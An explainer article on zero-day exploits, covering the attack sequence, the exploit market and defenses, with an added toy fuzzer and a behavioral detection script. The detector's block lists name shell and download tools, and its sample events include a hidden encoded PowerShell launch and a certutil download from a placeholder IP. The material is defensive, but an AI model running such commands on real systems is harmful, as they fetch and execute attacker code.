
What Are Zero-Day Exploits and How Do They Work?

Zero-day exploits target software flaws unknown to vendors, giving defenders zero days to respond. This explainer covers how they work, who buys them, and why they remain cybersecurity's most dangerous threat.

Redakcia

The Flaw Nobody Knows About

Every piece of software contains bugs. Most are harmless. But occasionally, a flaw grants an attacker the ability to take over a device, steal data, or install surveillance tools — and the software maker has no idea it exists. That flaw is called a zero-day vulnerability, and the code written to exploit it is a zero-day exploit. The name reflects a harsh reality: once an attacker strikes, the vendor has had "zero days" to prepare a fix.

Zero-days sit at the top of the cybersecurity threat hierarchy. Signature-based antivirus cannot match an exploit nobody has seen before, firewalls pass the traffic because it looks like ordinary document or web activity, and a system with every available update installed is still vulnerable, because the fix it needs does not exist yet. In 2025, Google's Threat Intelligence Group tracked 90 zero-day vulnerabilities exploited in the wild, up from 78 the year before, with nearly half targeting enterprise systems, an all-time high.

How a Zero-Day Attack Unfolds

A zero-day attack typically follows a sequence security researchers call the cyber kill chain. First, attackers discover an unknown flaw through reverse-engineering, fuzzing (feeding a program large numbers of automatically corrupted inputs and watching for crashes), or careful review of source code. Next, they build a weaponized exploit, often a small piece of code that triggers the vulnerability in a controlled way so that the attacker, rather than the program, decides what happens next.
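As an added illustration of the fuzzing step, here is a minimal mutation fuzzer. This is example code written for this explainer, not tooling from any source cited in the article; the record format, the parser and its bug, and the seed input are all constructed. The parser takes a length byte from the input and uses it as an offset without checking it against the data actually present, the same shape of mistake that becomes an out-of-bounds read in native code. The fuzzer corrupts a known-good record, treats the parser's own ValueError as a deliberate rejection, and reports the first mutation that produces any other failure.

```python
"""Minimal mutation fuzzer against a toy record parser.

Added example, not code from the article. The parser, its bug and the record
format are constructed to show what "fuzzing" means: feed a program many
slightly corrupted inputs and watch for failures it did not anticipate.
Production fuzzers (AFL++, libFuzzer) add coverage feedback and many more
mutation strategies, but the core loop is the same.
"""
import random
from typing import Optional


def parse_record(data: bytes) -> dict:
    """Parse a record laid out as [name_len:1][name:name_len][tag:1][payload:rest].

    Inputs the parser knows are malformed raise ValueError. The bug: name_len
    comes from the input and is used as an offset with no bounds check, so a
    corrupted length byte reads past the end of the buffer. In Python that is
    an IndexError; in C it would be an out-of-bounds read.
    """
    if len(data) < 3:
        raise ValueError("record too short")
    name_len = data[0]
    name = data[1:1 + name_len]
    tag = data[1 + name_len]          # unchecked offset derived from the input
    payload = data[2 + name_len:]
    return {"name": name, "tag": tag, "payload": payload}


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """Apply one random mutation: overwrite a byte, insert a byte, or truncate."""
    buf = bytearray(seed)
    op = rng.choice(("overwrite", "insert", "truncate"))
    if op == "overwrite":
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == "insert":
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    elif len(buf) > 1:
        del buf[rng.randrange(len(buf)):]
    return bytes(buf)


def fuzz(seed: bytes, iterations: int, rng_seed: int = 1) -> Optional[dict]:
    """Mutate `seed` repeatedly; return details of the first unexpected failure.

    ValueError is the parser's intended way of rejecting bad input and is not a
    bug. Any other exception means the parser lost control of its own state,
    which is the signal a fuzzer is looking for.
    """
    rng = random.Random(rng_seed)          # fixed seed keeps the run reproducible
    for i in range(iterations):
        case = mutate(seed, rng)
        try:
            parse_record(case)
        except ValueError:
            continue
        except Exception as exc:           # noqa: BLE001 - any crash is a finding
            return {"iteration": i, "input": case, "error": type(exc).__name__}
    return None


# Constructed seed: name "hello", tag 'T', two payload bytes.
SEED = b"\x05helloT\x01\x02"

if __name__ == "__main__":
    print("valid record:", parse_record(SEED))
    finding = fuzz(SEED, iterations=500)
    if finding:
        print(f"crash after {finding['iteration']} iterations: "
              f"{finding['error']} on input {finding['input']!r}")
```

The finding is the crashing input itself; turning it into a reliable exploit is the separate, much harder weaponization step the next paragraph describes. Note also that the same fuzzer, run by a vendor before release, would have found the bug first, which is why fuzzing is as much a defensive discipline as an offensive one.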

Delivery comes through familiar channels: a phishing email, a compromised website, or a malicious document. Once the exploit fires, the attacker gains a foothold, installing malware, escalating privileges, or opening a backdoor for persistent access. Because the flaw and the exploit are unknown to everyone but the attacker, there is no patch to close the hole and no signature describing the exploit, so traditional signature-based defenses have nothing to match against.

Modern campaigns frequently chain multiple vulnerabilities together. The DarkSword exploit kit, whose code was publicly leaked in March 2026, combined six iOS flaws — three of them zero-days — to achieve full device takeover, extracting contacts, messages, and keychain data from iPhones.

A Multi-Million-Dollar Market

Zero-day exploits are extraordinarily valuable. According to TechCrunch, a fully weaponized iPhone exploit chain can fetch $5 million to $7 million on the open market, while Android exploits command up to $5 million. Prices have multiplied in recent years as companies harden their products, making each working exploit rarer and more prized.

Three distinct buyer groups compete for these tools. Government intelligence agencies — with the Five Eyes nations historically dominating the market — purchase zero-days for surveillance and offensive cyber operations. Commercial spyware vendors like NSO Group stockpile them to power products such as Pegasus, which has been used against journalists, activists, and political figures worldwide. And criminal organizations deploy them in ransomware campaigns and data theft.

Why Defense Is So Difficult

The core challenge is asymmetry: attackers need to find just one flaw, while defenders must protect millions of lines of code. Research from CIQ shows that enterprise patch cycles take 30 to 60 days, yet attackers routinely weaponize disclosed vulnerabilities in under 15 days. In the first half of 2025, VulnCheck found that 32% of exploited vulnerabilities were attacked on or before the day of public disclosure. Those figures describe the race that begins once a flaw is public; a true zero-day is exploited before that race even starts, so faster patching narrows the window but can never close it on its own.

Since you cannot patch what you do not know about, organizations increasingly rely on behavioral detection: monitoring what software actually does rather than matching known signatures. A word processor launching a command shell, or a PDF reader downloading a file from the internet, is suspicious whichever bug was used to make it happen. Network segmentation, least-privilege access policies, and application sandboxing add further layers of defense by limiting what a successful exploit can reach. Apple's Lockdown Mode, for example, drastically reduces the iPhone's attack surface by disabling features attackers commonly exploit.
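The following is an added example of what behavioral detection looks like in practice; it is written for this explainer and is not code from any vendor or product named in the article. The process-creation events are constructed, and the field names, rule sets and command lines are assumptions for illustration; real telemetry would come from an EDR agent, Sysmon or auditd. The rules never reference a specific exploit. They encode expectations about how legitimate software behaves, so they fire on the post-exploitation step whether the initial flaw was a known CVE or a zero-day.

```python
"""Behavioral detection over process-creation telemetry.

Added example for this explainer, not code from any vendor named in the text.
The events below are constructed; real telemetry would come from an EDR agent,
Sysmon (Event ID 1) or auditd, and field names differ by source.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the newly created process
    cmdline: str        # command line the new process started with


# These sets encode expectations about behaviour, not knowledge of any exploit:
# a document viewer or mail client has no legitimate reason to launch a shell
# or a download utility, whichever bug the attacker used to get there.
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SHELLS_AND_SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_UTILITIES = {"certutil.exe", "bitsadmin.exe", "curl.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_COMMAND_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent) -> str:
    """Return the name of the first rule the event violates, or "" if none."""
    parent, child = basename(event.parent_image), basename(event.image)
    tokens = {t.lower() for t in event.cmdline.split()}
    if parent in DOCUMENT_HANDLERS and child in SHELLS_AND_SCRIPT_HOSTS:
        return "document handler spawned shell or script host"
    if parent in DOCUMENT_HANDLERS and child in DOWNLOAD_UTILITIES:
        return "document handler launched download utility"
    if child in {"powershell.exe", "pwsh.exe"} and tokens & ENCODED_COMMAND_FLAGS:
        return "encoded PowerShell command line"
    return ""


def detect(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, str]]:
    """Run every event through the rules and return (event, reason) pairs."""
    alerts = []
    for event in events:
        reason = classify(event)
        if reason:
            alerts.append((event, reason))
    return alerts


# Constructed sample telemetry: three benign events, three that mimic the
# foothold stage of a document-borne exploit chain.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", OFFICE + r"\WINWORD.EXE",
                 '"WINWORD.EXE" /n invoice.docx'),
    ProcessEvent(OFFICE + r"\WINWORD.EXE", SYS32 + r"\cmd.exe",
                 "cmd.exe /c start /min powershell -w hidden -enc SQBFAFgA"),
    ProcessEvent(r"C:\Program Files\Adobe\Acrobat Reader\AcroRd32.exe", SYS32 + r"\certutil.exe",
                 "certutil.exe -urlcache -split -f http://203.0.113.5/s.dat s.dat"),
    ProcessEvent(SYS32 + r"\services.exe", SYS32 + r"\svchost.exe",
                 "svchost.exe -k netsvcs"),
    ProcessEvent(SYS32 + r"\svchost.exe", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 "chrome.exe --type=renderer"),
]

if __name__ == "__main__":
    for event, reason in detect(SAMPLE_EVENTS):
        print(f"ALERT [{reason}] {basename(event.parent_image)} -> {event.cmdline}")
```

The trade-off is that behavioral rules produce false positives (an administrator's macro that legitimately runs a script, for instance), so each alert needs triage, and a careful attacker will try to stay inside the behaviour profile of the process they compromised. That is why the paragraph above pairs detection with segmentation, least privilege and sandboxing: if the exploit lands in a process that cannot spawn a shell or reach the network in the first place, the detection rule becomes a backstop rather than the only line.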

The Arms Race Continues

Zero-day exploits will remain cybersecurity's most potent weapon for the foreseeable future. As software grows more complex and the value of data increases, the incentive to discover — and sell — unknown flaws only grows. For ordinary users, the best defense is straightforward: keep devices updated, enable automatic patching, and treat unexpected links and attachments with suspicion. In the zero-day world, the clock starts at zero — and every hour without a fix counts.
